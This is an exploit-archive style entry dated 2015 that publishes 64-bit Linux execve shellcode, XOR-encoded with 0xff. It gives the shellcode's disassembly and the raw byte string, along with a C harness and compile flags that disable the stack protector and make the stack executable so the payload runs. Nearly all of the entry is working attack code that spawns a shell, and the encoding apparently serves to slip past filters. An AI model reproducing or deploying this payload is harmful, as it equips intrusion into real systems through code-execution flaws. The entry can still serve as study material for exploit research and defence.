Linux 64 bit - Encoded execve shellcode

2015-06-28 19:05:06

/*
Compile with: gcc -fno-stack-protector -z execstack
This execve shellcode is encoded with 0xff and is for 64 bit linux.

shell: file format elf64-x86-64


Disassembly of section .text:

0000000000400080 <start>:
400080: 48 b9 ff ff ff ff ff movabs rcx,0xffffffffffffffff
400087: ff ff ff
40008a: 49 b8 ae b7 72 c3 db movabs r8,0xfffaf0dbc372b7ae
400091: f0 fa ff
400094: 49 31 c8 xor r8,rcx
400097: 41 50 push r8
400099: 49 b8 d0 9d 96 91 d0 movabs r8,0x978cd0d091969dd0
4000a0: d0 8c 97
4000a3: 49 31 c8 xor r8,rcx
4000a6: 41 50 push r8
4000a8: 49 b8 b7 ce 2d ad 4f movabs r8,0x46b7c44fad2dceb7
4000af: c4 b7 46
4000b2: 49 31 c8 xor r8,rcx
4000b5: 41 50 push r8
4000b7: ff e4 jmp rsp

2015 William Borskey

*/
char shellcode[] = "\x48\xb9\xff\xff\xff\xff\xff\xff\xff\xff\x49\xb8\xae\xb7\x72\xc3\xdb\xf0\xfa\xff\x49\x31\xc8\x41\x50\x49\xb8\xd0\x9d\x96\x91\xd0\xd0\x8c\x97\x49\x31\xc8\x41\x50\x49\xb8\xb7\xce\x2d\xad\x4f\xc4\xb7\x46\x49\x31\xc8\x41\x50\xff\xe4";

int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) shellcode;
(int)(*func)();
return 0;
}


Fixes

No fixes

In order to submit a new fix you need to be registered.